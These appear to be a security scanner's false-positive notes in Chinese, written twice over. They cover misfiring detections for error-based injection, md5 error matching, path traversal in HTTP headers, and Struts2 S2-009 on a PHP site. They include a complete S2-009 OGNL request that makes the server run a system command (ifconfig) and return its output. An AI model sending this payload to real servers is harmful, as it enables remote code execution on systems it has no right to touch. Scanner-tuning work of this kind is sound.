显示报错注入:http://gitlab.xxx.com/help/README.md
md5报错语句出现了匹配问题
路经穿越: 出现了在refer ,User-Agent ,cookie ,这种不应该存在的地方
struts/s2-009:
误报: PHP网站发送了st2漏洞的payload 且显示存在
GET /search.php?q=test&page=2/(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ifconfig%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[({key})(%27meh%27)] HTTP/1.1
Host: 127.0.0.1
显示报错注入:http://gitlab.xxx.com/help/README.md
md5报错语句出现了匹配问题
路经穿越: 出现了在refer ,User-Agent ,cookie ,这种不应该存在的地方
struts/s2-009:
误报: PHP网站发送了st2漏洞的payload 且显示存在
GET /search.php?q=test&page=2/(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ifconfig%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[({key})(%27meh%27)] HTTP/1.1
Host: 127.0.0.1